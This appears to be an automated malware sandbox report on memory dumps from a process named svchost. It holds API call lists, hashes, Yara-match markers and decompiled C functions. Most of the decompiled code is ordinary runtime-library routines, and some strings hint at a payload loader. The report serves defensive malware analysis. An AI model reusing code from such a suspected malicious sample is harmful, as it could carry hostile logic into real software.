                                                • __freea.LIBCMT ref: 0399A7F0
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharCompareMultiStringWide___crt__freea$AllocateHeap
                                                • String ID:
                                                • API String ID: 621115845-0
                                                • Opcode ID: 782ba2a982e839d140e5f769c3f8fb554469a017da29e9e6774eb4b2111c5518
                                                • Instruction ID: 2b92c04006d1ea80f5dfbc8a1f2b1296764ecf2060f6945ac7e5914dc2b5159a
                                                • Opcode Fuzzy Hash: 782ba2a982e839d140e5f769c3f8fb554469a017da29e9e6774eb4b2111c5518
                                                • Instruction Fuzzy Hash: AC51EB72E00216ABEF25DFADCC81DAFBBB9EF90750B18856AE904DA150DB35C950C790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,00000040), ref: 03996542
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 03996564
                                                  • Part of subcall function 03996530: IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 03996578
                                                • IsBadHugeReadPtr.KERNEL32(?,00000040), ref: 03996856
                                                • IsBadHugeReadPtr.KERNEL32(?,000000F8), ref: 0399688C
                                                Strings
                                                • Invalid payload: , xrefs: 03996ACE
                                                • [-] VirtualAddress of section is out ouf bounds: , xrefs: 03996A39
                                                • [!] Truncated to maximal size: , xrefs: 039969BE
                                                • [!] Virtual section size is out ouf bounds: , xrefs: 0399697C
                                                • [-] Raw section size is out ouf bounds: , xrefs: 03996A80
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: HugeRead
                                                • String ID: Invalid payload: $[!] Truncated to maximal size: $[!] Virtual section size is out ouf bounds: $[-] Raw section size is out ouf bounds: $[-] VirtualAddress of section is out ouf bounds:
                                                • API String ID: 2080902951-4122123222
                                                • Opcode ID: f9b0182408fa1b1dc5b80e4ff22b49505a96088b75084aabc6bc69c1ba63d899
                                                • Instruction ID: 9bd47daefe41fc656c6b324722d590c226c6eaaa726e26004d4b52047b09dc05
                                                • Opcode Fuzzy Hash: f9b0182408fa1b1dc5b80e4ff22b49505a96088b75084aabc6bc69c1ba63d899
                                                • Instruction Fuzzy Hash: 0B81D275F012069BEF18DF6DD880A7FB7B9EF84324B18846ED406DB345EA34E8158B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 03995BED
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 03995C10
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 03995C30
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 03995CA9
                                                • std::_Facet_Register.LIBCPMT ref: 03995CBF
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 03995CCA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                • String ID: bad cast
                                                • API String ID: 2536120697-3145022300
                                                • Opcode ID: 545ca290a014f3a6b91492b482682a493a629f09c69b0e7c3e35217af7afbfbf
                                                • Instruction ID: 972f792f7994d836ad3648d7171378901e225d2e8fa218b86f461ffa2e119385
                                                • Opcode Fuzzy Hash: 545ca290a014f3a6b91492b482682a493a629f09c69b0e7c3e35217af7afbfbf
                                                • Instruction Fuzzy Hash: 4731EF76904215DBDF12EF9CD880AAEB7BCFB45724F16466AD811AB380E731A904CBD0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0399576D
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 03995790
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 039957B0
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 03995829
                                                • std::_Facet_Register.LIBCPMT ref: 0399583F
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0399584A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                • String ID: bad cast
                                                • API String ID: 2536120697-3145022300
                                                • Opcode ID: 132bae5e73f73d9155a15ff8dcc2b813172b965b5cf739f8e222646f4c42bd45
                                                • Instruction ID: 55c93d385197df1322aeb1a6ebb6d2f0e3d3f4958fa450319c1b71f410814df3
                                                • Opcode Fuzzy Hash: 132bae5e73f73d9155a15ff8dcc2b813172b965b5cf739f8e222646f4c42bd45
                                                • Instruction Fuzzy Hash: 1831E375914305DBDF11EF5CD880AAEB7B8FF49310F26469AD811AB280DB31A905CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 03995D1D
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 03995D40
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 03995D60
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 03995DD9
                                                • std::_Facet_Register.LIBCPMT ref: 03995DEF
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 03995DFA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                • String ID: bad cast
                                                • API String ID: 2536120697-3145022300
                                                • Opcode ID: 3ef06d20bcd98505060650ebbb536e1e05dcdee645e0c30e5f4a6428245fc390
                                                • Instruction ID: e406815436b25a4a7704bc07b24d1567080036b6a4b458329d0ff7f923059b05
                                                • Opcode Fuzzy Hash: 3ef06d20bcd98505060650ebbb536e1e05dcdee645e0c30e5f4a6428245fc390
                                                • Instruction Fuzzy Hash: 1431F07A910214DFEF12EF5CD880AAEB7B8FF45714F16429AD811AB380D731A901CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 03992F65
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 03992F92
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 03992FBF
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 03992FEC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Exception@8Throw
                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                • API String ID: 2005118841-1866435925
                                                • Opcode ID: 69a9f3c97a77e35e8eeb15782f2a3d19689c4511cf71f4bcb449c646dab75b23
                                                • Instruction ID: b647fc6111be47cc99b03cb74c4d24cce68cfc1307f9f58949c5925c227d01c7
                                                • Opcode Fuzzy Hash: 69a9f3c97a77e35e8eeb15782f2a3d19689c4511cf71f4bcb449c646dab75b23
                                                • Instruction Fuzzy Hash: C611CA745443087EFE00EB29CD12FAE77AC9BC0744F404C5EB9D4AA1D2D67090848B92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 039A5EE2: GetLastError.KERNEL32(00000008,039BE9B8,039A9694), ref: 039A5EE6
                                                  • Part of subcall function 039A5EE2: _free.LIBCMT ref: 039A5F19
                                                  • Part of subcall function 039A5EE2: SetLastError.KERNEL32(00000000,039A4866,00000016,039A54EF,?,?,039BE9B8), ref: 039A5F5A
                                                  • Part of subcall function 039A5EE2: _abort.LIBCMT ref: 039A5F60
                                                • _free.LIBCMT ref: 039A7C2B
                                                • _free.LIBCMT ref: 039A7C44
                                                • _free.LIBCMT ref: 039A7C76
                                                • _free.LIBCMT ref: 039A7C7F
                                                • _free.LIBCMT ref: 039A7C8B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorLast$_abort
                                                • String ID: C
                                                • API String ID: 1702784200-1037565863
                                                • Opcode ID: 9a532973fa5698834d3ca7e6d144c450cae51f17c42fd2a73e96782de38ef112
                                                • Instruction ID: f46d3fe0414aebd91d1bf00773a91dcde5a1231c644df61b62a4b100bc10cf54
                                                • Opcode Fuzzy Hash: 9a532973fa5698834d3ca7e6d144c450cae51f17c42fd2a73e96782de38ef112
                                                • Instruction Fuzzy Hash: E5B15C7590561ADFDB24DF98C885AADB7B8FF48304F1446EAE849A7350D731AE90CF80
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: d16d7271aec1b4bdc52d1b86dfd349aea82be587408fb65cb762ab55911e840f
                                                • Instruction ID: a71827f5a67f382a286bf42fece0cc35c6c586b3c92050d4f1ecabe4f9856933
                                                • Opcode Fuzzy Hash: d16d7271aec1b4bdc52d1b86dfd349aea82be587408fb65cb762ab55911e840f
                                                • Instruction Fuzzy Hash: 0C61A075D04705AFDB20EFACC840B9ABBF9EF84750F1446AAE944EB341E7709D418BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 73%
                                                			E6FD5C516(void* __ebx, void* __edi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                				signed int _v8;
                                                				signed char _v15;
                                                				char _v16;
                                                				void _v24;
                                                				short _v28;
                                                				char _v31;
                                                				void _v32;
                                                				long _v36;
                                                				intOrPtr _v40;
                                                				void* _v44;
                                                				signed int _v48;
                                                				signed char* _v52;
                                                				long _v56;
                                                				int _v60;
                                                				void* __esi;
                                                				signed int _t78;
                                                				signed int _t80;
                                                				int _t86;
                                                				void* _t94;
                                                				long _t97;
                                                				void _t105;
                                                				void* _t112;
                                                				signed int _t116;
                                                				signed int _t118;
                                                				signed char _t123;
                                                				signed char _t128;
                                                				intOrPtr _t129;
                                                				signed int _t131;
                                                				signed char* _t133;
                                                				intOrPtr* _t134;
                                                				signed int _t135;
                                                				void* _t136;
                                                
                                                				_t78 =  *0x6fd68008; // 0xc92c5105
                                                				_v8 = _t78 ^ _t135;
                                                				_t80 = _a8;
                                                				_t118 = _t80 >> 6;
                                                				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                				_t133 = _a12;
                                                				_v52 = _t133;
                                                				_v48 = _t118;
                                                				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x6fd6b358 + _t118 * 4)) + _t116 + 0x18));
                                                				_v40 = _a16 + _t133;
                                                				_t86 = GetConsoleCP();
                                                				_t134 = _a4;
                                                				_v60 = _t86;
                                                				 *_t134 = 0;
                                                				 *((intOrPtr*)(_t134 + 4)) = 0;
                                                				 *((intOrPtr*)(_t134 + 8)) = 0;
                                                				while(_t133 < _v40) {
                                                					_v28 = 0;
                                                					_v31 =  *_t133;
                                                					_t129 =  *((intOrPtr*)(0x6fd6b358 + _v48 * 4));
                                                					_t123 =  *(_t129 + _t116 + 0x2d);
                                                					if((_t123 & 0x00000004) == 0) {
                                                						if(( *(E6FD5C1E3(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                							_push(1);
                                                							_push(_t133);
                                                							goto L8;
                                                						} else {
                                                							if(_t133 >= _v40) {
                                                								_t131 = _v48;
                                                								 *((char*)( *((intOrPtr*)(0x6fd6b358 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                								 *( *((intOrPtr*)(0x6fd6b358 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x6fd6b358 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                								 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 4)) + 1;
                                                							} else {
                                                								_t112 = E6FD5AD52( &_v28, _t133, 2);
                                                								_t136 = _t136 + 0xc;
                                                								if(_t112 != 0xffffffff) {
                                                									_t133 =  &(_t133[1]);
                                                									goto L9;
                                                								}
                                                							}
                                                						}
                                                					} else {
                                                						_t128 = _t123 & 0x000000fb;
                                                						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                						_push(2);
                                                						_v15 = _t128;
                                                						 *(_t129 + _t116 + 0x2d) = _t128;
                                                						_push( &_v16);
                                                						L8:
                                                						_push( &_v28);
                                                						_t94 = E6FD5AD52();
                                                						_t136 = _t136 + 0xc;
                                                						if(_t94 != 0xffffffff) {
                                                							L9:
                                                							_t133 =  &(_t133[1]);
                                                							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                							_v56 = _t97;
                                                							if(_t97 != 0) {
                                                								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                									L19:
                                                									 *_t134 = GetLastError();
                                                								} else {
                                                									 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 8)) - _v52 + _t133;
                                                									if(_v36 >= _v56) {
                                                										if(_v31 != 0xa) {
                                                											goto L16;
                                                										} else {
                                                											_t105 = 0xd;
                                                											_v32 = _t105;
                                                											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                												goto L19;
                                                											} else {
                                                												if(_v36 >= 1) {
                                                													 *((intOrPtr*)(_t134 + 8)) =  *((intOrPtr*)(_t134 + 8)) + 1;
                                                													 *((intOrPtr*)(_t134 + 4)) =  *((intOrPtr*)(_t134 + 4)) + 1;
                                                													goto L16;
                                                												}
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                					goto L20;
                                                					L16:
                                                				}
                                                				L20:
                                                				return E6FD5599E(_v8 ^ _t135, _t134);
                                                			}


                                                APIs
                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,6FD5CC8B,?,00000000,?,00000000,00000000), ref: 6FD5C558
                                                • __fassign.LIBCMT ref: 6FD5C5D3
                                                • __fassign.LIBCMT ref: 6FD5C5EE
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 6FD5C614
                                                • WriteFile.KERNEL32(?,?,00000000,6FD5CC8B,00000000,?,?,?,?,?,?,?,?,?,6FD5CC8B,?), ref: 6FD5C633
                                                • WriteFile.KERNEL32(?,?,00000001,6FD5CC8B,00000000,?,?,?,?,?,?,?,?,?,6FD5CC8B,?), ref: 6FD5C66C
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: 0850d3248375cff0b1fc1778b4f64f5089c10de9b6815f485b5e22b4f9fd4f29
                                                • Instruction ID: 770e54b0a5a02cc7334123b241e1d85f5e824fe8f2b19b4f2038126703253173
                                                • Opcode Fuzzy Hash: 0850d3248375cff0b1fc1778b4f64f5089c10de9b6815f485b5e22b4f9fd4f29
                                                • Instruction Fuzzy Hash: 85517DB1A002499FDF11CFB8C881AEEBBF4EF49310F14415AE555E7291E730BA60CB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,039AAB87,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 039AA454
                                                • __fassign.LIBCMT ref: 039AA4CF
                                                • __fassign.LIBCMT ref: 039AA4EA
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 039AA510
                                                • WriteFile.KERNEL32(?,FF8BC35D,00000000,039AAB87,00000000,?,?,?,?,?,?,?,?,?,039AAB87,?), ref: 039AA52F
                                                • WriteFile.KERNEL32(?,?,00000001,039AAB87,00000000,?,?,?,?,?,?,?,?,?,039AAB87,?), ref: 039AA568
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
                                                • Opcode ID: 52e5ced389732443d417073694a48f4ac5ff371b29cbae9ea9ad52af16f89632
                                                • Instruction ID: 4e885066287cfaf58324ef42eaf3d490ca4659d5451a9ea9fd020444c3646738
                                                • Opcode Fuzzy Hash: 52e5ced389732443d417073694a48f4ac5ff371b29cbae9ea9ad52af16f89632
                                                • Instruction Fuzzy Hash: 1151D471E046099FDB10CFACD885AEEFBF8EF49310F14465AE956EB241E7309941CBA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E6FD5D870(intOrPtr _a4) {
                                                				void* _t18;
                                                
                                                				_t45 = _a4;
                                                				if(_a4 != 0) {
                                                					E6FD5D834(_t45, 7);
                                                					E6FD5D834(_t45 + 0x1c, 7);
                                                					E6FD5D834(_t45 + 0x38, 0xc);
                                                					E6FD5D834(_t45 + 0x68, 0xc);
                                                					E6FD5D834(_t45 + 0x98, 2);
                                                					E6FD59FB4( *((intOrPtr*)(_t45 + 0xa0)));
                                                					E6FD59FB4( *((intOrPtr*)(_t45 + 0xa4)));
                                                					E6FD59FB4( *((intOrPtr*)(_t45 + 0xa8)));
                                                					E6FD5D834(_t45 + 0xb4, 7);
                                                					E6FD5D834(_t45 + 0xd0, 7);
                                                					E6FD5D834(_t45 + 0xec, 0xc);
                                                					E6FD5D834(_t45 + 0x11c, 0xc);
                                                					E6FD5D834(_t45 + 0x14c, 2);
                                                					E6FD59FB4( *((intOrPtr*)(_t45 + 0x154)));
                                                					E6FD59FB4( *((intOrPtr*)(_t45 + 0x158)));
                                                					E6FD59FB4( *((intOrPtr*)(_t45 + 0x15c)));
                                                					return E6FD59FB4( *((intOrPtr*)(_t45 + 0x160)));
                                                				}
                                                				return _t18;
                                                			}





                                                APIs
                                                  • Part of subcall function 6FD5D834: _free.LIBCMT ref: 6FD5D85D
                                                • _free.LIBCMT ref: 6FD5D8BE
                                                  • Part of subcall function 6FD59FB4: HeapFree.KERNEL32(00000000,00000000,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?), ref: 6FD59FCA
                                                  • Part of subcall function 6FD59FB4: GetLastError.KERNEL32(?,?,6FD5D862,?,00000000,?,00000000,?,6FD5D889,?,00000007,?,?,6FD5D4FB,?,?), ref: 6FD59FDC
                                                • _free.LIBCMT ref: 6FD5D8C9
                                                • _free.LIBCMT ref: 6FD5D8D4
                                                • _free.LIBCMT ref: 6FD5D928
                                                • _free.LIBCMT ref: 6FD5D933
                                                • _free.LIBCMT ref: 6FD5D93E
                                                • _free.LIBCMT ref: 6FD5D949
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 6eeaca6fd720981fe17979740369c31a5c33e6d791374819849b7ddb0d78f749
                                                • Instruction ID: 3bd02b5f0887bdff621ea289a9772ae9ee0011ed3740e049ad63daa7bc0ff5ab
                                                • Opcode Fuzzy Hash: 6eeaca6fd720981fe17979740369c31a5c33e6d791374819849b7ddb0d78f749
                                                • Instruction Fuzzy Hash: A01154B1545B04A6DEA0ABB4CC05FCFBB9E5F00748F400915A7AD6A3D0D775F524C671
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                  • Part of subcall function 039AE6A0: _free.LIBCMT ref: 039AE6C9
                                                • _free.LIBCMT ref: 039AE9A7
                                                  • Part of subcall function 039A496C: HeapFree.KERNEL32(00000000,00000000,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?), ref: 039A4982
                                                  • Part of subcall function 039A496C: GetLastError.KERNEL32(?,?,039AE6CE,?,00000000,?,00000000,?,039AE972,?,00000007,?,?,039AC3DB,?,?), ref: 039A4994
                                                • _free.LIBCMT ref: 039AE9B2
                                                • _free.LIBCMT ref: 039AE9BD
                                                • _free.LIBCMT ref: 039AEA11
                                                • _free.LIBCMT ref: 039AEA1C
                                                • _free.LIBCMT ref: 039AEA27
                                                • _free.LIBCMT ref: 039AEA32
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 9bc8c3e54f5c8dae5663f75ff40172627b974c9512e873cbc2ef3ff916828a46
                                                • Instruction ID: 230e43af5c9f9d3a1bc478325ce07b3ec9279a2d9b3d7dc90e91a8b8ef48c555
                                                • Opcode Fuzzy Hash: 9bc8c3e54f5c8dae5663f75ff40172627b974c9512e873cbc2ef3ff916828a46
                                                • Instruction Fuzzy Hash: 6A112C75D44F04EAD560FBB5CC05FCBBBAC6FC0700F804E15B29AAE151DA65B9154690
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E6FD580F4(void* __ecx) {
                                                				void* _t5;
                                                				void* _t6;
                                                				void* _t9;
                                                				void* _t15;
                                                				long _t16;
                                                				void* _t17;
                                                				void* _t20;
                                                				void* _t21;
                                                
                                                				if( *0x6fd69450 != 0xffffffff) {
                                                					_t16 = GetLastError();
                                                					_t20 = E6FD58903(__eflags,  *0x6fd69450);
                                                					_t9 = _t15;
                                                					__eflags = _t20;
                                                					if(_t20 == 0) {
                                                						_t21 = E6FD5A03C(_t9, 1, 0x28);
                                                						__eflags = _t21;
                                                						if(__eflags == 0) {
                                                							L6:
                                                							SetLastError(_t16);
                                                							_t17 = 0;
                                                						} else {
                                                							_t6 = E6FD5893D(__eflags,  *0x6fd69450, _t21);
                                                							__eflags = _t6;
                                                							if(_t6 != 0) {
                                                								SetLastError(_t16);
                                                								_t17 = _t21;
                                                								_t21 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								goto L6;
                                                							}
                                                						}
                                                						E6FD59FB4(_t21);
                                                						_t5 = _t17;
                                                					} else {
                                                						SetLastError(_t16);
                                                						_t5 = _t20;
                                                					}
                                                					return _t5;
                                                				} else {
                                                					return 0;
                                                				}
                                                			}


                                                APIs
                                                • GetLastError.KERNEL32(00000001,00000000,6FD574B6,6FD55AB7,6FD55D5E,?,6FD55F5B,?,00000001,?,?,00000001,?,6FD66800,0000000C,6FD56064), ref: 6FD58102
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6FD58110
                                                • SetLastError.KERNEL32(00000000,6FD55F5B,?,00000001,?,?,00000001,?,6FD66800,0000000C,6FD56064,?,00000001,?), ref: 6FD5811D
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.970420884.000000006FD51000.00000020.00000001.01000000.00000004.sdmp, Offset: 6FD50000, based on PE: true
                                                • Associated: 00000002.00000002.970398654.000000006FD50000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970463965.000000006FD61000.00000002.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970495480.000000006FD68000.00000004.00000001.01000000.00000004.sdmp
                                                • Associated: 00000002.00000002.970528694.000000006FD6C000.00000002.00000001.01000000.00000004.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_6fd50000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorLast$Value___vcrt_
                                                • String ID:
                                                • API String ID: 483936075-0
                                                • Opcode ID: b94fa36f6046b30c82cb5bfa083935a8d2ce9f0c189e3d88be474c2c4125b891
                                                • Instruction ID: 09e1bd80d68e27285450592b36ad6e617bf790c15a98ae06ad1a2410337aa0ad
                                                • Opcode Fuzzy Hash: b94fa36f6046b30c82cb5bfa083935a8d2ce9f0c189e3d88be474c2c4125b891
                                                • Instruction Fuzzy Hash: E9F0F43F55CB20DBAF910335980896A27549B87B76F150216F914D6284DF207421E7F1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetLastError.KERNEL32(-FC63E248,00000004,0399EC67,0399C031,03995B80), ref: 0399EC7E
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0399EC8C
                                                • SetLastError.KERNEL32(00000000,?,73BB4020), ref: 0399EC99
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Offset: 03991000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3991000_svchost.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$Value___vcrt_
                                                • String ID:
                                                • API String ID: 483936075-0
                                                • Opcode ID: 5095162262afdf28cdd414ebf2e4b23e23746cd5cae1b9bdd35082646f71e1d9
                                                • Instruction ID: c2ae847a4e4aa44919292be5a45c85aef1a997c7dcab72dd1f120efad485b410
                                                • Opcode Fuzzy Hash: 5095162262afdf28cdd414ebf2e4b23e23746cd5cae1b9bdd35082646f71e1d9
                                                • Instruction Fuzzy Hash: 73F02D3AE0D71057EE31F73EBD0857F26589BC5AF27154126F4019E185FF20880163D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E6FD5D05E(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                				signed int _v8;
                                                				int _v12;
                                                				void* _v24;
                                                				void* __esi;
                                                				signed int _t49;
                                                				signed int _t54;
                                                				int _t58;
                                                				signed int _t60;
                                                				short* _t62;
                                                				signed int _t66;
                                                				short* _t70;
                                                				int _t71;
                                                				int _t78;
                                                				short* _t81;
                                                				signed int _t87;
                                                				signed int _t90;
                                                				void* _t95;
                                                				void* _t96;
                                                				int _t98;
                                                				short* _t101;
                                                				int _t103;
                                                				void* _t104;
                                                				signed int _t106;
                                                				short* _t107;
                                                				void* _t110;
                                                
                                                				_push(__ecx);
                                                				_push(__ecx);
                                                				_t49 =  *0x6fd68008; // 0xc92c5105
                                                				_v8 = _t49 ^ _t106;
                                                				_t103 = _a20;
                                                				if(_t103 > 0) {
                                                					_t78 = E6FD5DE00(_a16, _t103);
                                                					_t110 = _t78 - _t103;
                                                					_t4 = _t78 + 1; // 0x1
                                                					_t103 = _t4;
                                                					if(_t110 >= 0) {
                                                						_t103 = _t78;
                                                					}
                                                				}
                                                				_t98 = _a32;
                                                				if(_t98 == 0) {
                                                					_t98 =  *( *_a4 + 8);
                                                					_a32 = _t98;
                                                				}
